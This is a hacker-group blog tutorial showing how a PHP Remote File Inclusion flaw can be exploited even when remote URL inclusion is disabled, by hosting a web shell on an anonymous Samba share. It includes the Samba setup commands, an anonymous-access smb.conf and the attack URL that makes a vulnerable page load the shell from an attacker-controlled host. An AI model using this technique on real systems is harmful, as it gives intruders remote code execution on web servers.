PHP and SMB share file access

Attack scenario outline

PHP environment settings

Configuring the SAMBA server with anonymous read access (Linux Machine)

apt-get install samba

mkdir /var/www/html/pub/

chmod 0555 /var/www/html/pub/ chown -R nobody:nogroup /var/www/html/pub/

echo > /etc/samba/smb.conf

[global] workgroup = WORKGROUP server string = Samba Server %v netbios name = indishell-lab security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes [ica] path = /var/www/html/pub writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody

service smbd restart

\\192.168.0.3\

Hosting PHP web shell in SMB share

\\192.168.0.3\ica\

Attacking the File Inclusion vulnerable parameter

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php



--==[[ With Love from Team IndiShell ]]==--



--==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3 ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

Pranaam to all _/\_In this blog post, I am going to demonstrate the technique of exploiting Remote File Inclusion (RFI) vulnerability in PHP applications which is vulnerable to "File Inclusion attack". We will bypass the Remote URL inclusion restriction and perform the exploitation of RFI even if PHP environment is configured not to include files from remote HTTP/FTP URL.In PHP Configuration file, "allow_url_include" wrapper by-default set to "Off" which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if "allow_url_include" and "allow_url_fopen" both are set to "Off". This behaviour of PHP can be abused to load remotely hosted PHP web shell from SMB share.When vulnerable PHP application code try to load PHP web shell from attacker controlled SMB share, SMB share should allow access to the file. Attacker need to configure SMB server with anonymous browsing access enable on it. So, once vulnerable application try to access PHP web shell from SMB share, SMB server will not ask for any credential and PHP code of web shell will be included by the vulnerable application.Let's start, first of all I reconfigured PHP environment and disabled "allow_url_fopen" as well as "allow_url_include" in php.ini file. Later configured SMB server with anonymous read access. Once SMB share is ready, exploit the vulnerable applicationMachine which has vulnerable code hosted on it has "allow_url_fopen" and "allow_url_include" set to "Off"Screenshot of current configuration of the PHP version "5.5.11":Before proceeding, let's make sure PHP code is not allowing Remote File Inclusion when we try to access web shell hosted on HTTP.Application is throwing error and RFI is not happening when I tried to include PHP web shell from remote host.Install SAMBA server using below mentioned command:Create SMB share directory (in my case /var/www/html/pub/)Configure permissions on newly created SMB share directory:Run below mentioned command to remove default content of SAMBA server config filePut below mentioned content in file '/etc/samba/smb.conf'Now, restart SAMBA server to apply new configuration spcified in config file /etc/samba/smb.confOnce SAMBA server has been restarted successfully, try to access SMB share and make sure SAMBA server is not asking for credentials.In my case, SAMBA server IP is 192.168.0.3, I need to access SMB share in Windows file explorer as mentioned below:Awesome, SMB share is accessible and showing that directory 'ica' is present.Now, host PHP shell in directory '/var/www/html/pub' which is the directory of the SMB share diretory 'ica'.Once we have PHP shell in directory '/var/www/html/pub', access the directory SMB share directory 'ica' using Windows file explorer.You will see PHP shell is present is the SMB share directory. In my case it is box.phpPerfect, let's use this PHP shell SMB link and browse it using vulnerable PHP code.Dang Dang! PHP vulnerable code fetched the web shell from SMB share and executed the code \m/ on application server. We have bypassed the restriction and included the web shell hosted on remote host.